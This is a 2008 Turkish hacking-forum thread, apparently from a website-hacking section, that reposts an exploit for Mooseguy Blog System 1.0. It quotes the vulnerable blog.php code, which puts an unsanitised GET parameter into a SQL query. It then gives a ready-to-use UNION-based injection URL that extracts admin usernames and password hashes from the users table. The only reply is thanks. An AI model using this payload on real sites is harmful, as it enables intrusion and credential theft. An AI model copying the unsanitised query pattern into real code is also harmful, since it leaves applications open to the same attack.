Would you like to react to this message? Create an account in a few clicks or log in to continue.



 
AnasayfaSon görsellerAramaKayıt OlGiriş yap

 

 Mooseguy Blog System 1.0 SQL Injection

Aşağa gitmek 
2 posters
YazarMesaj
THe-LaWRoS
üye
üye
THe-LaWRoS


Mesaj Sayısı : 31
Yaş : 34
Kayıt tarihi : 08/02/08

Mooseguy Blog System 1.0 SQL Injection Empty
MesajKonu: Mooseguy Blog System 1.0 SQL Injection   Mooseguy Blog System 1.0 SQL Injection Icon_minitimeCuma Şub. 08, 2008 10:06 pm

# MGBS 1.0 Remote SQL injection

# Script url http://sourceforge.net/project/showf...roup_id=193233

# Vulnerable code in blog.php

<?php
$month = $_GET['month'];
$result = mysql_query("SELECT * FROM blog WHERE posted='$month' ORDER BY id DESC") or die("HELP QUERY BROKEN");
...

# Admin hash exploit

http://[target]/[path]/blog.php?month='+union+select+1,2,3,4,5,concat_ws( 0x3a,id,uname,upass),7,8+from+users/*

# Bug discovered by The_HuliGun
Sayfa başına dön Aşağa gitmek
Blué-kinq
|administratör|
|administratör|
Blué-kinq


Erkek Mesaj Sayısı : 229
Yaş : 35
Nerden : Antalya
İş/Hobiler : hacker
Lakap : Blué-Kinq
Kayıt tarihi : 07/02/08

Mooseguy Blog System 1.0 SQL Injection Empty
MesajKonu: Geri: Mooseguy Blog System 1.0 SQL Injection   Mooseguy Blog System 1.0 SQL Injection Icon_minitimeSalı Şub. 12, 2008 4:42 am

saol tesekkurler paylasım için Smile
Sayfa başına dön Aşağa gitmek
https://system.forumieren.com
 
Mooseguy Blog System 1.0 SQL Injection
Sayfa başına dön 
1 sayfadaki 1 sayfası

Bu forumun müsaadesi var:Bu forumdaki mesajlara cevap veremezsiniz
 :: ...:::HackBölümü:::... :: WebSiteHack-
Buraya geçin: